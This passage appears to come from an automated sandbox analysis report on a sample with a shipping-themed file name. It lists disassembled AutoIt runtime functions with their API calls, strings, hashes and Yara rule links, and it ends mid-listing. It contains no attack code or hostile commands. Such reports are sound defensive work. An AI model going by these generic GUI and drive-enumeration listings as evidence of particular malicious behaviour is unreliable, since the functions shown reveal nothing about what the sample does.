CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AE2DA8
GlobalFree.KERNEL32(00000000), ref: 00AE2DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AE2DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,00AFFC38,00000000), ref: 00AE2DDB
GlobalFree.KERNEL32(00000000), ref: 00AE2DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00AE2E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00AE2E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AE2E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00AE303F

Strings

@U=u, xrefs: 00AE2E30, 00AE2FBF
AutoIt v3, xrefs: 00AE2CF2
DISPLAY, xrefs: 00AE2EA2
, xrefs: 00AE2FC5
static, xrefs: 00AE2D3A, 00AE2E91

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $@U=u$AutoIt v3$DISPLAY$static
API String ID: 2211948467-3613752883
Opcode ID: 2ced211fb1ed2c1183810f7d1208dec2a1fdab995193bfda78126010ba89782e
Instruction ID: b96ab7500a413232831d76ff53b83805be87b53bfa421ffbff5f85d314a601ad
Opcode Fuzzy Hash: 2ced211fb1ed2c1183810f7d1208dec2a1fdab995193bfda78126010ba89782e
Instruction Fuzzy Hash: 99027D71500209AFDB14DFA5CD89EAE7BB9FF48720F108558F916AB2A1DB70AD01CB60

Function 00AF70D5 Relevance: 59.8, APIs: 33, Strings: 1, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00AF712F
GetSysColorBrush.USER32(0000000F), ref: 00AF7160
GetSysColor.USER32(0000000F), ref: 00AF716C
SetBkColor.GDI32(?,000000FF), ref: 00AF7186
SelectObject.GDI32(?,?), ref: 00AF7195
InflateRect.USER32(?,000000FF,000000FF), ref: 00AF71C0
GetSysColor.USER32(00000010), ref: 00AF71C8
CreateSolidBrush.GDI32(00000000), ref: 00AF71CF
FrameRect.USER32(?,?,00000000), ref: 00AF71DE
DeleteObject.GDI32(00000000), ref: 00AF71E5
InflateRect.USER32(?,000000FE,000000FE), ref: 00AF7230
FillRect.USER32(?,?,?), ref: 00AF7262
GetWindowLongW.USER32(?,000000F0), ref: 00AF7284

Part of subcall function 00AF73E8: GetSysColor.USER32(00000012), ref: 00AF7421
Part of subcall function 00AF73E8: SetTextColor.GDI32(?,?), ref: 00AF7425
Part of subcall function 00AF73E8: GetSysColorBrush.USER32(0000000F), ref: 00AF743B
Part of subcall function 00AF73E8: GetSysColor.USER32(0000000F), ref: 00AF7446
Part of subcall function 00AF73E8: GetSysColor.USER32(00000011), ref: 00AF7463
Part of subcall function 00AF73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00AF7471
Part of subcall function 00AF73E8: SelectObject.GDI32(?,00000000), ref: 00AF7482
Part of subcall function 00AF73E8: SetBkColor.GDI32(?,00000000), ref: 00AF748B
Part of subcall function 00AF73E8: SelectObject.GDI32(?,?), ref: 00AF7498
Part of subcall function 00AF73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00AF74B7
Part of subcall function 00AF73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00AF74CE
Part of subcall function 00AF73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00AF74DB

Strings

@U=u, xrefs: 00AF72CC

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID: @U=u
API String ID: 4124339563-2594219639
Opcode ID: 8b69799c0dfdbb446cb90efcc99f8c6f5d0c7ffc1b3ea53ccfda3593020660ae
Instruction ID: 697569c422e1e470b3da8d51192af3be4d6438637984b5f09be3360bbe49d6df
Opcode Fuzzy Hash: 8b69799c0dfdbb446cb90efcc99f8c6f5d0c7ffc1b3ea53ccfda3593020660ae
Instruction Fuzzy Hash: A7A17E72008309AFD710DFE5DD48ABE7BA9FB49330F100B19FAA2961A1D771E945CB51

Function 00A78D85 Relevance: 49.5, APIs: 26, Strings: 2, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00A78E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 00AB6AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00AB6AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00AB6F43

Part of subcall function 00A78F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A78BE8,?,00000000,?,?,?,?,00A78BBA,00000000,?), ref: 00A78FC5

SendMessageW.USER32(?,00001053), ref: 00AB6F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00AB6F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 00AB6FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 00AB6FB7

Strings

@U=u, xrefs: 00AB6AC5, 00AB6BD6, 00AB6EBF
0, xrefs: 00AB6DCF

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0$@U=u
API String ID: 2760611726-975001249
Opcode ID: 5dc1b95c4e8ae2e044051112755b25c76da61037aa2febafd22a2a772a570821
Instruction ID: ee5dc0f59634a73a76e3b32f2e62f15804225f4b7f4f8dda10de60645dea613e
Opcode Fuzzy Hash: 5dc1b95c4e8ae2e044051112755b25c76da61037aa2febafd22a2a772a570821
Instruction Fuzzy Hash: 69129C30604201DFDB25CF28C958BBABBF9FB45310F248569E4898B262CB39EC52DB51

Function 00AE2711 Relevance: 47.6, APIs: 22, Strings: 5, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00AE273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00AE286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00AE28A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00AE28B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00AE2900
GetClientRect.USER32(00000000,?), ref: 00AE290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00AE2955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00AE2964
GetStockObject.GDI32(00000011), ref: 00AE2974
SelectObject.GDI32(00000000,00000000), ref: 00AE2978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00AE2988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00AE2991
DeleteDC.GDI32(00000000), ref: 00AE299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00AE29C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 00AE29DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00AE2A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00AE2A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00AE2A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00AE2A77
GetStockObject.GDI32(00000011), ref: 00AE2A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00AE2A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00AE2A97

Strings

msctls_progress32, xrefs: 00AE2A13
@U=u, xrefs: 00AE29CC
AutoIt v3, xrefs: 00AE28F8
DISPLAY, xrefs: 00AE295A
static, xrefs: 00AE294F, 00AE2A71

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: @U=u$AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-2771358697
Opcode ID: 7d04b80a3e5721a0870aeda15411c11e4385e820aeafa96a4ff9d3ad4b2f4bb8
Instruction ID: 0569fa96b2584edbb836d816aa39dfe5bf683808a6841b0c85cbac6a1dd3478f
Opcode Fuzzy Hash: 7d04b80a3e5721a0870aeda15411c11e4385e820aeafa96a4ff9d3ad4b2f4bb8
Instruction Fuzzy Hash: D8B16B75A00219BFEB14DFA9CD89FAE7BB9EB08710F104515F915E72A0DB70AD40CBA4

Function 00AF73E8 Relevance: 47.5, APIs: 26, Strings: 1, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00AF7421
SetTextColor.GDI32(?,?), ref: 00AF7425
GetSysColorBrush.USER32(0000000F), ref: 00AF743B
GetSysColor.USER32(0000000F), ref: 00AF7446
CreateSolidBrush.GDI32(?), ref: 00AF744B
GetSysColor.USER32(00000011), ref: 00AF7463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00AF7471
SelectObject.GDI32(?,00000000), ref: 00AF7482
SetBkColor.GDI32(?,00000000), ref: 00AF748B
SelectObject.GDI32(?,?), ref: 00AF7498
InflateRect.USER32(?,000000FF,000000FF), ref: 00AF74B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00AF74CE
GetWindowLongW.USER32(00000000,000000F0), ref: 00AF74DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00AF752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00AF7554
InflateRect.USER32(?,000000FD,000000FD), ref: 00AF7572
DrawFocusRect.USER32(?,?), ref: 00AF757D
GetSysColor.USER32(00000011), ref: 00AF758E
SetTextColor.GDI32(?,00000000), ref: 00AF7596
DrawTextW.USER32(?,00AF70F5,000000FF,?,00000000), ref: 00AF75A8
SelectObject.GDI32(?,?), ref: 00AF75BF
DeleteObject.GDI32(?), ref: 00AF75CA
SelectObject.GDI32(?,?), ref: 00AF75D0
DeleteObject.GDI32(?), ref: 00AF75D5
SetTextColor.GDI32(?,?), ref: 00AF75DB
SetBkColor.GDI32(?,?), ref: 00AF75E5

Strings

@U=u, xrefs: 00AF752A

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID: @U=u
API String ID: 1996641542-2594219639
Opcode ID: 83e5e244149eb9aeee0873e68abb3cbe0bddfcf7c43c1c89e0ba07762a56d597
Instruction ID: 7566f3ff40bfa3d24d799b2d1f74c8c2cce6d55bbdb8da9b2e42397974d2abab
Opcode Fuzzy Hash: 83e5e244149eb9aeee0873e68abb3cbe0bddfcf7c43c1c89e0ba07762a56d597
Instruction Fuzzy Hash: 6B614972904218AFDB01DFE5DD49EEEBFB9EB08320F114215FA15AB2A1D7749941CB90

Function 00AD4ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00AD4AED
GetDriveTypeW.KERNEL32(?,00AFCB68,?,\\.\,00AFCC08), ref: 00AD4BCA
SetErrorMode.KERNEL32(00000000,00AFCB68,?,\\.\,00AFCC08), ref: 00AD4D36

Strings

Removable, xrefs: 00AD4C10, 00AD4C15
\\.\, xrefs: 00AD4B3F
SAS, xrefs: 00AD4CC9
Network, xrefs: 00AD4C02
Virtual, xrefs: 00AD4CE5
ATAPI, xrefs: 00AD4C91
SCSI, xrefs: 00AD4C8A
ATA, xrefs: 00AD4C98
RAMDisk, xrefs: 00AD4BF4
FileBackedVirtual, xrefs: 00AD4CEC
MMC, xrefs: 00AD4CDE
SATA, xrefs: 00AD4CD0
PhysicalDrive, xrefs: 00AD4B76
Fibre, xrefs: 00AD4CAD
SSD, xrefs: 00AD4C4A
CDROM, xrefs: 00AD4BFB
Fixed, xrefs: 00AD4C09
1394, xrefs: 00AD4C9F
Unknown, xrefs: 00AD4BED, 00AD4C83
iSCSI, xrefs: 00AD4CC2
USB, xrefs: 00AD4CB4
SSA, xrefs: 00AD4CA6
RAID, xrefs: 00AD4CBB

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 34a0a7a9de51a00ccc3c284a0e8a96ddab1fea54e71f33269cb4d971945ca966
Instruction ID: 2574cf095787beab6ca995757633abc0f80906097018537d101f3713f8570a7f
Opcode Fuzzy Hash: 34a0a7a9de51a00ccc3c284a0e8a96ddab1fea54e71f33269cb4d971945ca966
Instruction Fuzzy Hash: 6F619E30616109EBCB04DF64DA8297D77B1EB4C748B2484A7F80BAB7A1DB36ED41DB41

Function 00AF0241 Relevance: 37.1, APIs: 7, Strings: 14, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00AF02E5
_wcslen.LIBCMT ref: 00AF031F
_wcslen.LIBCMT ref: 00AF0389
_wcslen.LIBCMT ref: 00AF03F1
_wcslen.LIBCMT ref: 00AF0475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00AF04C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AF0504

Part of subcall function 00A7F9F2: _wcslen.LIBCMT ref: 00A7F9FD

Part of subcall function 00AC223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AC2258
Part of subcall function 00AC223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AC228A

Strings

@U=u, xrefs: 00AF04C5, 00AF0504
GETSELECTED, xrefs: 00AF05E1
ISSELECTED, xrefs: 00AF04DD
DESELECT, xrefs: 00AF059C
SELECTINVERT, xrefs: 00AF057E
GETSUBITEMCOUNT, xrefs: 00AF0384, 00AF039F
VIEWCHANGE, xrefs: 00AF0675
GETTEXT, xrefs: 00AF03EC, 00AF0407
SELECTALL, xrefs: 00AF0515
SELECT, xrefs: 00AF0548
SELECTCLEAR, xrefs: 00AF052D
GETITEMCOUNT, xrefs: 00AF0316, 00AF0337
GETSELECTEDCOUNT, xrefs: 00AF0470, 00AF048B
FINDITEM, xrefs: 00AF0627

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: @U=u$DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 1103490817-1753161424
Opcode ID: e56a5a3682c9c4981191e3dea21d1675ce56f7d98bccb9b4ce43a30ea1c7f229
Instruction ID: 2f26c438f416c3252c55542e9c1d95ef83fe95157c1d79083b6b7a49bc858f9c
Opcode Fuzzy Hash: e56a5a3682c9c4981191e3dea21d1675ce56f7d98bccb9b4ce43a30ea1c7f229
Instruction Fuzzy Hash: 3BE1CE312182058FC714DF64CA50D7AB7E6FF88314B148A6DFA9A9B3A2DB30ED45CB51

Function 00AF0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00AF1128
GetDesktopWindow.USER32 ref: 00AF113D
GetWindowRect.USER32(00000000), ref: 00AF1144
GetWindowLongW.USER32(?,000000F0), ref: 00AF1199
DestroyWindow.USER32(?), ref: 00AF11B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00AF11ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AF120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00AF121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 00AF1232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00AF1245
IsWindowVisible.USER32(00000000), ref: 00AF12A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00AF12BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00AF12D0
GetWindowRect.USER32(00000000,?), ref: 00AF12E8
MonitorFromPoint.USER32(?,?,00000002), ref: 00AF130E
GetMonitorInfoW.USER32(00000000,?), ref: 00AF1328
CopyRect.USER32(?,?), ref: 00AF133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 00AF13AA

Strings

(, xrefs: 00AF131B
tooltips_class32, xrefs: 00AF11E6
0, xrefs: 00AF10D3

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 8bffb5603913fc35d4684227b2121784b5b7c87a436da9ce3066bb8de7493bbf
Instruction ID: 9feb9fc178c4dded169eaad1ce7d2213227857d1ee5de9a574cbb4bcda892dc7
Opcode Fuzzy Hash: 8bffb5603913fc35d4684227b2121784b5b7c87a436da9ce3066bb8de7493bbf
Instruction Fuzzy Hash: 75B1AF71608345EFD740DFA5C984BAABBE4FF84350F00891CFA9A9B2A1DB71D845CB51

Function 00A78891 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A78968
GetSystemMetrics.USER32(00000007), ref: 00A78970
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A7899B
GetSystemMetrics.USER32(00000008), ref: 00A789A3
GetSystemMetrics.USER32(00000004), ref: 00A789C8
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00A789E5
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00A789F5
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00A78A28
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00A78A3C
GetClientRect.USER32(00000000,000000FF), ref: 00A78A5A
GetStockObject.GDI32(00000011), ref: 00A78A76
SendMessageW.USER32(00000000,00000030,00000000), ref: 00A78A81

Part of subcall function 00A7912D: GetCursorPos.USER32(?), ref: 00A79141
Part of subcall function 00A7912D: ScreenToClient.USER32(00000000,?), ref: 00A7915E
Part of subcall function 00A7912D: GetAsyncKeyState.USER32(00000001), ref: 00A79183
Part of subcall function 00A7912D: GetAsyncKeyState.USER32(00000002), ref: 00A7919D

SetTimer.USER32(00000000,00000000,00000028,00A790FC), ref: 00A78AA8

Strings

@U=u, xrefs: 00A78A81
AutoIt v3 GUI, xrefs: 00A78A20

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: @U=u$AutoIt v3 GUI
API String ID: 1458621304-2077007950
Opcode ID: 0a220d30d30c8509fa52ad5dc41b649d6e8688d16b0ddc5b78fcb4f03e731311
Instruction ID: 1d557b756cda5d7bea6f7c7357759a15d4213de2dce5aa84c97ed4cb9fc882e8
Opcode Fuzzy Hash: 0a220d30d30c8509fa52ad5dc41b649d6e8688d16b0ddc5b78fcb4f03e731311
Instruction Fuzzy Hash: 47B16D71A40209AFDB14DFA9CD49BEE3BB9FB48314F108629FA15A7290DB34A841CB51

Function 00AC5A1B Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00AC5A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00AC5A40
SetWindowTextW.USER32(?,?), ref: 00AC5A57
GetDlgItem.USER32(?,000003EA), ref: 00AC5A6C
SetWindowTextW.USER32(00000000,?), ref: 00AC5A72
GetDlgItem.USER32(?,000003E9), ref: 00AC5A82
SetWindowTextW.USER32(00000000,?), ref: 00AC5A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00AC5AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00AC5AC3
GetWindowRect.USER32(?,?), ref: 00AC5ACC
_wcslen.LIBCMT ref: 00AC5B33
SetWindowTextW.USER32(?,?), ref: 00AC5B6F
GetDesktopWindow.USER32 ref: 00AC5B75
GetWindowRect.USER32(00000000), ref: 00AC5B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00AC5BD3
GetClientRect.USER32(?,?), ref: 00AC5BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 00AC5C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00AC5C2F

Strings

@U=u, xrefs: 00AC5A40

Memory Dump Source

Source File: 00000000.00000002.1420982073.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000000.00000002.1420965764.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000AFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421032949.0000000000B22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421074446.0000000000B2C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1421123048.0000000000B34000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a60000_DHL 745-12302024.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID: @U=u
API String ID: 895679908-2594219639
Opcode ID: 47c1823d111b513ae914a862aba6f80f039ddd6e0dfd1735d9291997b0239fe5
Instruction ID: 7c28f93a6709e48bb6808e5124730e76156a03fcb372ab74eb4a364351cfa33d
Opcode Fuzzy Hash: 47c1823d111b513ae914a862aba6f80f039ddd6e0dfd1735d9291997b0239fe5
Instruction Fuzzy Hash: 6E713731900A09AFDB20DFA9CE89FAEBBF5EB48714F11491CE142A25A0D775B984CB50

Function 00AF091E Relevance: 31.9, APIs: 6, Strings: 12, Instructions: 372windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00AF09C6
_wcslen.LIBCMT ref: 00AF0A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00AF0A54
_wcslen.LIBCMT ref: 00AF0A8A
_wcslen.LIBCMT ref: 00AF0B06
_wcslen.LIBCMT ref: 00AF0B81

Part of subcall function 00A7F9F2: _wcslen.LIBCMT ref: 00A7F9FD

